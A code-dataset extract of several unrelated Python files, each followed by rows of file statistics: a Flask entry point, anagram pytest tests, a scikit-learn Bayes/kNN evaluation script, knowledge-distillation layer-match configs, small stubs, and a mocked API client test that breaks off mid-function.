from fypy.model.levy.NIG import NIG | 44.833333 | 55 | 0.847584 | 42 | 269 | 5.428571 | 0.285714 | 0.210526 | 0.342105 | 0.447368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085502 | 269 | 6 | 56 | 44.833333 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b99b3b090aecd6be059ff180811e82f558bfa672 | 146 | py | Python | wsgi.py | Luffky/INFOX | c3827e460e17840606ced61ddea1be81907df207 | [
"MIT"
] | 3 | 2020-03-08T18:19:19.000Z | 2022-03-31T20:15:55.000Z | wsgi.py | Luffky/INFOX | c3827e460e17840606ced61ddea1be81907df207 | [
"MIT"
] | 3 | 2020-02-23T14:37:13.000Z | 2021-02-08T20:28:28.000Z | wsgi.py | Luffky/INFOX | c3827e460e17840606ced61ddea1be81907df207 | [
"MIT"
] | 3 | 2020-02-18T15:13:33.000Z | 2021-08-15T14:38:51.000Z | from flask import Flask
from app import create_app
CONFIGURE_MODE = "production"
# CONFIGURE_MODE = "default"
app = create_app(CONFIGURE_MODE)
| 16.222222 | 32 | 0.787671 | 20 | 146 | 5.5 | 0.45 | 0.354545 | 0.327273 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.143836 | 146 | 8 | 33 | 18.25 | 0.88 | 0.178082 | 0 | 0 | 0 | 0 | 0.084746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b99c6b74fa7b9ffc247fc78d3a1a59045c7337ef | 1,787 | py | Python | challenges/fb_challenge/hard/test_hard.py | arsummers/python-data-structures-and-algorithms | 30a488bd1100d8edac3b7fda73f7d7d999c61bfc | [
"MIT"
] | null | null | null | challenges/fb_challenge/hard/test_hard.py | arsummers/python-data-structures-and-algorithms | 30a488bd1100d8edac3b7fda73f7d7d999c61bfc | [
"MIT"
] | 21 | 2019-07-08T22:01:38.000Z | 2019-08-29T05:36:26.000Z | challenges/fb_challenge/hard/test_hard.py | arsummers/python-data-structures-and-algorithms | 30a488bd1100d8edac3b7fda73f7d7d999c61bfc | [
"MIT"
] | 1 | 2019-07-11T07:45:57.000Z | 2019-07-11T07:45:57.000Z | import pytest
from hard import anagram, anagram_oneliner
def test_exists():
assert anagram
assert anagram_oneliner
def test_simple():
text = ['poke', 'ekop', 'kope', 'peok']
expected = ['poke']
actual = anagram(text)
assert expected == actual
def test_medium():
text = ['code', 'doce', 'frame', 'edoc', 'framer']
expected = ['code', 'frame', 'framer']
actual = anagram(text)
assert expected == actual
def test_harder():
text = ['duck', 'alice', 'ckud', 'ecila']
expected = ['alice', 'duck']
actual = anagram(text)
assert expected == actual
def test_base_case():
text = ['code', 'doce', 'frame', 'edoc', 'framer', 'famer']
expected = ['code', 'frame', 'framer']
actual = anagram(text)
assert expected == actual
def test_single():
text = ['python']
expected = ['python']
actual = anagram(text)
assert expected == actual
# TESTS FOR ONELINER
def test_simple_one():
text = ['poke', 'ekop', 'kope', 'peok']
expected = ['poke']
actual = anagram_oneliner(text)
assert expected == actual
def test_medium_one():
text = ['code', 'doce', 'frame', 'edoc', 'framer']
expected = ['code', 'frame', 'framer']
actual = anagram_oneliner(text)
assert expected == actual
def test_harder_one():
text = ['duck', 'alice', 'ckud', 'ecila']
expected = ['alice', 'duck']
actual = anagram_oneliner(text)
assert expected == actual
def test_base_case_one():
text = ['code', 'doce', 'frame', 'edoc', 'framer', 'famer']
expected = ['code', 'frame', 'framer']
actual = anagram_oneliner(text)
assert expected == actual
def test_single_one():
text = ['python']
expected = ['python']
actual = anagram_oneliner(text)
assert expected == actual
| 25.898551 | 63 | 0.612759 | 201 | 1,787 | 5.323383 | 0.18408 | 0.071963 | 0.168224 | 0.224299 | 0.863551 | 0.863551 | 0.784112 | 0.702804 | 0.629907 | 0.472897 | 0 | 0 | 0.216564 | 1,787 | 68 | 64 | 26.279412 | 0.764286 | 0.010073 | 0 | 0.727273 | 0 | 0 | 0.158461 | 0 | 0 | 0 | 0 | 0 | 0.218182 | 1 | 0.2 | false | 0 | 0.036364 | 0 | 0.236364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9c2a7a90d08513af70b7334644ba8ca915159a8 | 7,801 | py | Python | src/main.py | amalroy/tipr-first-assignment | 778d7f4de766d52af9141991a44faaba5d526b9a | [
"MIT"
] | null | null | null | src/main.py | amalroy/tipr-first-assignment | 778d7f4de766d52af9141991a44faaba5d526b9a | [
"MIT"
] | null | null | null | src/main.py | amalroy/tipr-first-assignment | 778d7f4de766d52af9141991a44faaba5d526b9a | [
"MIT"
] | null | null | null | import argparse
import numpy as np
from numpy import genfromtxt
from sklearn.model_selection import KFold
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.preprocessing import normalize
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import f1_score
from sklearn.metrics import accuracy_score
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import lsh
import bayes
import projections
import nn
def reduce_dim(X,loc):
k=X.shape[1]
d=2
while(d<=int(np.ceil(k/2))):
fname=loc+'/X_dim_'+str(d)+'.csv'
X_red=projections.random_proj(X,d)
np.savetxt(fname,X_red,delimiter=' ')
d=d*2
count_vect = CountVectorizer()
parser = argparse.ArgumentParser()
parser.add_argument('--test-data')
parser.add_argument('--test-label')
parser.add_argument('--dataset')
parser.add_argument('--mode')
args=parser.parse_args()
discrete=False
if (args.dataset=='twitter'):
discrete=True
with open(args.test_data) as file:
tweets=file.readlines()
X=count_vect.fit_transform(tweets)
y=genfromtxt(args.test_label,delimiter=' ')
else:
X=genfromtxt(args.test_data,delimiter=' ')
y=genfromtxt(args.test_label,delimiter=' ')
X=normalize(X)
def bayes_train_test(X,y):
n_splits=3
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
y_pred=bayes.predict(X_test,X_train,y_train)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
def knn_train_test(X,y,k):
n_splits=10
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
y_pred=nn.cluster_knn(X_test,X_train,y_train,k)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
def bayes_sklearn(X,y):
n_splits=10
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
clf = GaussianNB()
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
clf.fit(X_train, y_train)
y_pred=clf.predict(X_test)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
def knn(X,y,k):
n_splits=10
kf = KFold(n_splits,shuffle=True)
kf.get_n_splits(X)
accuracy=[]
f1_macro=[]
f1_micro=[]
clf = KNeighborsClassifier(n_neighbors=k)
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
clf.fit(X_train, y_train)
y_pred=clf.predict(X_test)
accuracy.append(accuracy_score(y_test,y_pred))
f1_macro.append(f1_score(y_test,y_pred,average='macro'))
f1_micro.append(f1_score(y_test,y_pred,average='micro'))
acc=np.mean(np.asarray(accuracy))
f1_ma=np.mean(np.asarray(f1_macro))
f1_mi=np.mean(np.asarray(f1_micro))
print("Test accuracy ::",acc)
print("Test macro F1 Score ::",f1_ma)
print("Test micro F1 Score ::",f1_mi)
return acc,f1_ma,f1_mi
if __name__ == '__main__':
red=0
find_pca=False
if(find_pca==True):
d=2
k=X.shape[1]
n_run=int(np.log2(k))-1
dims=np.zeros(n_run)
accuracy=np.zeros(n_run)
f1_macro=np.zeros(n_run)
f1_micro=np.zeros(n_run)
i=0
while(d<=int(np.ceil(k/2))):
pca=PCA(n_components=d, svd_solver='arpack')
X_red=pca.fit(X)
X_red=normalize(X)
#acc,f1_ma,f1_mi=knn_train_test(X_red.toarray(),y,3)
acc,f1_ma,f1_mi=bayes_train_test(X_red,y)
#acc,f1_ma,f1_mi=bayes_sklearn(X.toarray(),y)
#acc,f1_ma,f1_mi=knn(X.toarray(),y,5)
accuracy[i]=acc
f1_macro[i]=f1_ma
f1_micro[i]=f1_mi
dims[i]=d
i=i+1
d=d*2
f=plt.figure()
plt.plot(dims,accuracy)
plt.xlabel('Dimension')
plt.ylabel('Accuracy')
plt.savefig('task_7_acc_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_macro)
plt.xlabel('Dimension')
plt.ylabel('f1-macro')
plt.savefig('task_7_f1_macro_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_micro)
plt.xlabel('Dimension')
plt.ylabel('f1-micro')
plt.savefig('task_7_f1_micro_bayes_'+args.dataset+'.png')
plt.show()
#bayes_train_test(X,y)
#print(X)
#reduce_dim(X,'../data/'+args.dataset)
#bayes_sklearn(X,y)
#knn(X,y,5)
#do computation on original matrix
if(red==0):
#run required classifier here
bayes_train_test(X,y)
#knn_train_test(X,y)
#bayes_sklearn(X,y)
#knn(X,y,5)
#do computation on reduced matrix
elif(red==1):
k=X.shape[1]
n_run=int(np.log2(k))-1
dims=np.zeros(n_run)
accuracy=np.zeros(n_run)
f1_macro=np.zeros(n_run)
f1_micro=np.zeros(n_run)
#
loc='../data/'+args.dataset
d=2
i=0
while(d<=int(np.ceil(k/2))):
fname=loc+'/X_dim_'+str(d)+'.csv'
X_red=genfromtxt(fname,delimiter=' ')
y=genfromtxt(args.test_label,delimiter=' ')
X=normalize(X)
#acc,f1_ma,f1_mi=knn_train_test(X_red.toarray(),y,3)
acc,f1_ma,f1_mi=bayes_train_test(X_red,y)
#acc,f1_ma,f1_mi=bayes_sklearn(X.toarray(),y)
#acc,f1_ma,f1_mi=knn(X.toarray(),y,5)
accuracy[i]=acc
f1_macro[i]=f1_ma
f1_micro[i]=f1_mi
dims[i]=d
i=i+1
d=d*2
f=plt.figure()
plt.plot(dims,accuracy)
plt.xlabel('Dimension')
plt.ylabel('Accuracy')
plt.savefig('task_3_acc_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_macro)
plt.xlabel('Dimension')
plt.ylabel('f1-macro')
plt.savefig('task_3_f1_macro_bayes_'+args.dataset+'.png')
f=plt.figure()
plt.plot(dims,f1_micro)
plt.xlabel('Dimension')
plt.ylabel('f1-micro')
plt.savefig('task_3_f1_micro_bayes_'+args.dataset+'.png')
plt.show()
| 34.065502 | 65 | 0.631329 | 1,237 | 7,801 | 3.74131 | 0.118027 | 0.033276 | 0.020743 | 0.028522 | 0.753025 | 0.736819 | 0.722342 | 0.722342 | 0.708081 | 0.703544 | 0 | 0.024294 | 0.22433 | 7,801 | 228 | 66 | 34.214912 | 0.740539 | 0.063582 | 0 | 0.708134 | 0 | 0 | 0.085506 | 0.012078 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023923 | false | 0 | 0.076555 | 0 | 0.119617 | 0.057416 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9f789e247f4f654a54364db43aeb156677c622f | 6,950 | py | Python | generative/distill_matches.py | yzhhome/JDQA | 68e1d0259d316b3577a1f2fafa773b50f1885762 | [
"MIT"
] | 1 | 2021-12-21T10:50:21.000Z | 2021-12-21T10:50:21.000Z | generative/distill_matches.py | kalanile/JDQA | 68e1d0259d316b3577a1f2fafa773b50f1885762 | [
"MIT"
] | null | null | null | generative/distill_matches.py | kalanile/JDQA | 68e1d0259d316b3577a1f2fafa773b50f1885762 | [
"MIT"
] | 1 | 2021-12-21T10:50:20.000Z | 2021-12-21T10:50:20.000Z | '''
@Author: dengzaiyong
@Date: 2021-09-21 15:16:08
@LastEditTime: 2021-09-27 19:37:08
@LastEditors: dengzaiyong
@Desciption: Define layer matches and losses for knowledge distillation
@FilePath: /JDQA/generative/distill_matches.py
'''
L3_attention_mse=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_mse", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_mse", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_mse", "weight":1}]
L3_attention_ce=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_ce", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_ce", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_ce", "weight":1}]
L3_attention_mse_sum=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_mse_sum", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_mse_sum", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_mse_sum", "weight":1}]
L3_attention_ce_mean=[{"layer_T":4, "layer_S":1, "feature":"attention", "loss":"attention_ce_mean", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"attention", "loss":"attention_ce_mean", "weight":1},
{"layer_T":12, "layer_S":3, "feature":"attention", "loss":"attention_ce_mean", "weight":1}]
L3_hidden_smmd=[{"layer_T":[0,0], "layer_S":[0,0], "feature":"hidden", "loss":"mmd", "weight":1},
{"layer_T":[4,4], "layer_S":[1,1], "feature":"hidden", "loss":"mmd", "weight":1},
{"layer_T":[8,8], "layer_S":[2,2], "feature":"hidden", "loss":"mmd", "weight":1},
{"layer_T":[12,12],"layer_S":[3,3], "feature":"hidden", "loss":"mmd", "weight":1}]
L3n_hidden_mse=[{"layer_T":0, "layer_S":0, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]},
{"layer_T":4, "layer_S":1, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]},
{"layer_T":8, "layer_S":2, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]},
{"layer_T":12,"layer_S":3, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",384,768]}]
L3_hidden_mse=[{"layer_T":0, "layer_S":0, "feature":"hidden", "loss":"hidden_mse", "weight":1},
{"layer_T":4, "layer_S":1, "feature":"hidden", "loss":"hidden_mse", "weight":1},
{"layer_T":8, "layer_S":2, "feature":"hidden", "loss":"hidden_mse", "weight":1},
{"layer_T":12,"layer_S":3, "feature":"hidden", "loss":"hidden_mse", "weight":1}]
L3l_hidden_mse=[{"layer_T":0, "layer_S":0, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]},
{"layer_T":4, "layer_S":1, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]},
{"layer_T":8, "layer_S":2, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]},
{"layer_T":12,"layer_S":3, "feature":"hidden", "loss":"hidden_mse", "weight":1, "proj":["linear",1024,768]}]
L4_attention_mse = [{"layer_T": 3, "layer_S": 1, "feature": "attention", "loss": "attention_mse", "weight": 1},
{"layer_T": 6, "layer_S": 2, "feature": "attention", "loss": "attention_mse", "weight": 1},
{"layer_T": 9, "layer_S": 3, "feature": "attention", "loss": "attention_mse", "weight": 1},
{"layer_T": 12, "layer_S": 4, "feature": "attention", "loss": "attention_mse", "weight": 1}]
L4_attention_ce = [{"layer_T": 3, "layer_S": 1, "feature": "attention", "loss": "attention_ce","weight": 1},
{"layer_T": 6, "layer_S": 2, "feature": "attention", "loss": "attention_ce", "weight": 1},
{"layer_T": 9, "layer_S": 3, "feature": "attention", "loss": "attention_ce", "weight": 1},
{"layer_T": 12, "layer_S": 4, "feature": "attention", "loss": "attention_ce", "weight": 1}]
L4_attention_mse_sum = [{"layer_T": 3,"layer_S": 1,"feature": "attention","loss": "attention_mse_sum","weight": 1},
{"layer_T": 6,"layer_S": 2,"feature": "attention","loss": "attention_mse_sum","weight": 1},
{"layer_T": 9,"layer_S": 3,"feature": "attention","loss": "attention_mse_sum","weight": 1},
{"layer_T": 12,"layer_S": 4,"feature": "attention","loss": "attention_mse_sum","weight": 1}]
L4_attention_ce_mean = [{"layer_T": 3,"layer_S": 1,"feature": "attention","loss": "attention_ce_mean","weight": 1},
{"layer_T": 6,"layer_S": 2,"feature": "attention","loss": "attention_ce_mean","weight": 1},
{"layer_T": 9,"layer_S": 3,"feature": "attention","loss": "attention_ce_mean","weight": 1},
{"layer_T": 12,"layer_S": 4,"feature": "attention","loss": "attention_ce_mean","weight": 1}]
L4_hidden_smmd = [{"layer_T": [0, 0],"layer_S": [0, 0],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [3, 3],"layer_S": [1, 1],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [6, 6],"layer_S": [2, 2],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [9, 9],"layer_S": [3, 3],"feature": "hidden","loss": "mmd","weight": 1},
{"layer_T": [12, 12],"layer_S": [4, 4],"feature": "hidden","loss": "mmd","weight": 1}]
L4t_hidden_mse = [{"layer_T": 0,"layer_S": 0,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 3,"layer_S": 1,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 6,"layer_S": 2,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 9,"layer_S": 3,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]},
{"layer_T": 12,"layer_S": 4,"feature": "hidden","loss": "hidden_mse","weight": 1,"proj": ["linear", 312, 768]}]
matches = {
'L3_attention_mse': L3_attention_mse,
'L3_attention_mse_sum': L3_attention_mse_sum,
'L3_attention_ce': L3_attention_ce,
'L3_attention_ce_mean': L3_attention_ce_mean,
'L3n_hidden_mse': L3n_hidden_mse,
'L3_hidden_smmd': L3_hidden_smmd,
'L3_hidden_mse': L3_hidden_mse,
'L3l_hidden_mse': L3l_hidden_mse,
'L4_attention_mse': L4_attention_mse,
'L4_attention_mse_sum': L4_attention_mse_sum,
'L4_attention_ce': L4_attention_ce,
'L4_attention_ce_mean': L4_attention_ce_mean,
'L4t_hidden_mse': L4t_hidden_mse,
'L4_hidden_smmd': L4_hidden_smmd,
} | 74.731183 | 129 | 0.570504 | 949 | 6,950 | 3.899895 | 0.064278 | 0.087544 | 0.097271 | 0.105377 | 0.901918 | 0.859768 | 0.809241 | 0.790057 | 0.784383 | 0.784383 | 0 | 0.061376 | 0.184173 | 6,950 | 93 | 130 | 74.731183 | 0.591358 | 0.033237 | 0 | 0 | 0 | 0 | 0.453963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6a2c1a467b3ccd73ed73d38ea15d9acd9f6de16d | 159 | py | Python | robinhood/robinhood/doctype/robin_chapter_mapping/test_robin_chapter_mapping.py | nikhilponnuru/robinhood | 51270012e2776170b242dc16f0bab5e132d644f7 | [
"MIT"
] | 4 | 2021-12-14T03:23:30.000Z | 2022-03-13T12:30:54.000Z | robinhood/robinhood/doctype/robin_chapter_mapping/test_robin_chapter_mapping.py | nikhilponnuru/robinhood | 51270012e2776170b242dc16f0bab5e132d644f7 | [
"MIT"
] | 2 | 2022-01-11T11:16:42.000Z | 2022-01-18T06:48:01.000Z | robinhood/robinhood/doctype/robin_chapter_mapping/test_robin_chapter_mapping.py | nikhilponnuru/robinhood | 51270012e2776170b242dc16f0bab5e132d644f7 | [
"MIT"
] | 3 | 2021-11-30T12:36:27.000Z | 2022-02-25T10:31:59.000Z | # Copyright (c) 2021, zerodha and Contributors
# See license.txt
# import frappe
import unittest
class TestRobinChapterMapping(unittest.TestCase):
pass
| 15.9 | 49 | 0.773585 | 18 | 159 | 6.833333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029851 | 0.157233 | 159 | 9 | 50 | 17.666667 | 0.88806 | 0.465409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
dbef333aea7202c524932785ca07129547d78bdf | 43 | py | Python | vnpy/gateway/coincap/__init__.py | xingtian888/vnpy | a7c7b22a1c73b28ace4225b66a374c586a5221be | [
"MIT"
] | null | null | null | vnpy/gateway/coincap/__init__.py | xingtian888/vnpy | a7c7b22a1c73b28ace4225b66a374c586a5221be | [
"MIT"
] | null | null | null | vnpy/gateway/coincap/__init__.py | xingtian888/vnpy | a7c7b22a1c73b28ace4225b66a374c586a5221be | [
"MIT"
] | null | null | null | from .coincap_gateway import CoinCapGateway | 43 | 43 | 0.906977 | 5 | 43 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e0265a53272d9ea5a14c360c2634d7da4ed487e7 | 96 | py | Python | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_block_docstring.py | GiulianaPola/select_repeats | 17a0d053d4f874e42cf654dd142168c2ec8fbd11 | [
"MIT"
] | 2 | 2022-03-13T01:58:52.000Z | 2022-03-31T06:07:54.000Z | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_block_docstring.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | 19 | 2021-11-20T04:09:18.000Z | 2022-03-23T15:05:55.000Z | venv/lib/python3.8/site-packages/numpy/f2py/tests/test_block_docstring.py | DesmoSearch/Desmobot | b70b45df3485351f471080deb5c785c4bc5c4beb | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/74/1b/ab/0633a9e085e848921b083d2496012fdf3cff0e97d913cc73f965b6b244 | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.447917 | 0 | 96 | 1 | 96 | 96 | 0.447917 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e03c6235425d2f234c472ff095684e9e9c024175 | 34 | py | Python | alarme/extras/sensor/web/__init__.py | insolite/alarme | 2312e88299a07d47435f475e5617213404e6d365 | [
"MIT"
] | null | null | null | alarme/extras/sensor/web/__init__.py | insolite/alarme | 2312e88299a07d47435f475e5617213404e6d365 | [
"MIT"
] | 1 | 2017-02-04T13:03:05.000Z | 2017-02-04T13:03:05.000Z | alarme/extras/sensor/web/__init__.py | insolite/alarme | 2312e88299a07d47435f475e5617213404e6d365 | [
"MIT"
] | null | null | null | from .web_sensor import WebSensor
| 17 | 33 | 0.852941 | 5 | 34 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 34 | 1 | 34 | 34 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0eb7bbea23a7b1342db678d15ba401889ace2df3 | 3,417 | py | Python | mlcycle/tests/test_project.py | cemizm/mlcycle-pyclient | 2494d6eb5b841049e05163edec560627ffe5a197 | [
"MIT"
] | null | null | null | mlcycle/tests/test_project.py | cemizm/mlcycle-pyclient | 2494d6eb5b841049e05163edec560627ffe5a197 | [
"MIT"
] | null | null | null | mlcycle/tests/test_project.py | cemizm/mlcycle-pyclient | 2494d6eb5b841049e05163edec560627ffe5a197 | [
"MIT"
] | null | null | null | import mlcycle
import dataclasses
import unittest
from httmock import all_requests, HTTMock
@all_requests
def get_all(url, request):
return {'status_code': 200,'content': '[{"name": "Project 1","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}]'}
@all_requests
def get_by_id(url, request):
return {'status_code': 200,'content': '{"name": "Project 1","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}'}
@all_requests
def add(url, requests):
return {'status_code': 200,'content': '{"name": "Project 1","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}'}
@all_requests
def update(url, requests):
return {'status_code': 200,'content': '{"name": "Project 2","gitRepository": "https://github.com/cemizm/tf-benchmark-gpu.git","id": "97df69fb-8fe1-48a1-835f-c0d699789a78"}'}
@all_requests
def delete(url, requests):
return {'status_code': 200}
class TestProject(unittest.TestCase):
def setUp(self):
self.client = mlcycle.init_with("https://192.168.99.100:5001/api")
def test_get_all(self):
with HTTMock(get_all):
project = mlcycle.models.Project(name="Project 1", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
resp = self.client.Projects.get_all()
self.assertTrue(dataclasses.is_dataclass(resp[0]))
self.assertEqual(resp[0], project)
def test_get_by_id(self):
with HTTMock(get_by_id):
project = mlcycle.models.Project(name="Project 1", gitRepository="https://github.com/cemizm/tf-benchmark-gpu.git", id="97df69fb-8fe1-48a1-835f-c0d699789a78")
